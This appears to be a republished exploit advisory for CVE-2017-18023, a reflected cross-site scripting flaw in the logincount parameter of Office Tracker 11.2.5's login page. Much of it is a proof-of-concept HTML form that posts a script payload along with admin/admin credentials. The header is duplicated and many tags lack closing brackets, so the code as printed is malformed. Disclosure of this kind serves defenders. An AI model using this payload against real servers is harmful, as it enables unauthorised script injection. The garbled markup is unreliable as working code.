Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Title: Office Tracker 11.2.5 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18023 # Title: Office Tracker 11.2.5 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18023



# Description

Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.

------------------------------------------

# Details

The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<scriptalert(1)</scriptp9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's
response.

------------------------------------------

# Vulnerability Type

Cross Site Scripting (XSS)

------------------------------------------

# Attack Type

Remote
------------------------------------------

# POC
<html>

<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/otweb/OTPClientLogin" method="POST"
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" /
<input type="hidden" name="lastname" value="MorisonM" /
<input type="hidden" name="timezone" value="" /
<input type="hidden" name="uid" value="" /
<input type="hidden" name="phone" value="false" /
<input type="hidden" name="login" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="submitbtn" value="Login" /
<input type="submit" value="Submit request" /
</form
</body
</html

------------------------------------------